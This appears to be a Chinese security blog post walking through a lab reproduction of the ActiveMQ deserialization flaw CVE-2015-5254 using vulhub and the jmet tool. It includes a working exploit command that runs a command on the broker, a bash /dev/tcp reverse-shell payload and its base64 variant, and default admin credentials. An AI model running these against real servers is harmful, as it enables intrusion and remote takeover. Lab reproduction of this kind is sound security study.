当前位置:首页 > 漏洞复现 > 正文内容

ActiveMQ反序列化漏洞_CVE-2015-5254

UzJu2年前 (2022-04-17)漏洞复现1774

0x00 安装docker-compose

Ubuntu安装docker-compose

使用DaoCloud源下载

sudo curl -L https://get.daocloud.io/docker/compose/releases/download/1.22.0/docker-compose-`uname -s`-`uname -m` -o /usr/local/bin/docker-compose

设置权限

sudo chmod +x /usr/local/bin/docker-compose

image-20211227191401501

0x01 启动漏洞环境

1、执行touch命令

首先将漏洞环境全部Git到服务器上

git clone https://github.com/vulhub/vulhub.git

随后进入到对应的目录即可

docker-compose up -d

随后会开始下载

image-20211227191520167

image-20211227191636221

随后可以看到漏洞环境已经启动成功

0x02 漏洞复现

下载提供的jmet进行漏洞利用

https://github.com/matthiaskaiser/jmet/releases/tag/0.1.0

随后执行

java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "touch /tmp/success" -Yp ROME IP 61616

Tips: 如果使用的是云服务器,需要对应提供商后台放通安全组

image-20211227194401739

随后访问WEB页面

http://ip:8161/admin/browse.jsp?JMSDestination=event

账号为admin 密码为admin

image-20211227194525850

这里可以看到有一个事件,点击这个事件即可

image-20211227194646696

可以看到已经执行了命令,新建了一个success文件

2、反弹shell

执行命令如下

值得注意的是,关于bash反弹shell的原理,有一篇文章非常推荐

https://www.cnblogs.com/bonelee/p/11021996.html

java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "bash -i >& /dev/tcp/ip/1234 0>&1" -Yp ROME ip 61616

或者进行base编码

java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "bash -c {echo,base64}|{base64,-d}|{bash,-i}" -Yp ROME ip 61616

image-20211227195020592

访问WEB页面,我们可以看到新增了一个事件,点击事件即可,不过再次之前,我们需要使用nc监听1234端口

image-20211227195154148

nc -lvp 1234

image-20211227225744180

在点击事件后,我们成功获取到shell

image-20211227225838105

0x03 参考

1、https://github.com/vulhub/vulhub/blob/master/activemq/CVE-2015-5254/README.zh-cn.md

扫描二维码推送至手机访问。

版权声明:本文由UzJu的安全屋发布,如需转载请注明出处。

SQL ERROR: ERROR 1105 (HY000): XPATH syntax error: '~root@localhost'

本文链接:https://uzzju.com/post/37.java

分享给朋友:

相关文章

CVE-2021-40438-ApacheSSRF复现

CVE-2021-40438-ApacheSSRF复现

Apache SSRF漏洞复现一、环境搭建 M1装个docker真麻烦,后来才发现是我的/usr/local/bin目录有问题太草了 下载httpd,在百度找了好久都没有找到可以编译的,只能尝试一下docker docker pu...

Spring Cloud Gateway Actuator API SpEL表达式注入命令执行(CVE-2022-22947)

Spring Cloud Gateway Actuator API SpEL表达式注入命令执行(CVE-2022-22947)

Spring Cloud Gateway Actuator API SpEL表达式注入命令执行(CVE-2022-22947)一、环境搭建https://github.com/vulhub/vulhub/tree/master/spring...

Apereo CAS 4.1反序列化与APPWebAuthByPass

Apereo CAS 4.1反序列化与APPWebAuthByPass

0x00 安装docker-composeUbuntu安装docker-compose 使用DaoCloud源下载 sudo curl -L https://get.daocloud.io/docker/compose/releases...

发表评论

访客

◎欢迎参与讨论,请在这里发表您的看法和观点。